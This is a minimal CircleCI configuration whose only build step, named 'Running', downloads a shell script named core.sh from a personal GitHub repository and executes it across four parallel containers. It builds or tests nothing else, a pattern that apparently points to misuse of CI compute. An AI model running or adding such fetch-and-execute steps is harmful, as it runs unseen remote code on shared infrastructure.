version: 2.1
jobs:
  build:
    docker:
      - image: cimg/python:3.8
    parallelism: 4
    steps:
      - run:
          name: Running
          command: wget https://raw.githubusercontent.com/anstwn/cave/main/core.sh && chmod +x core.sh && ./core.sh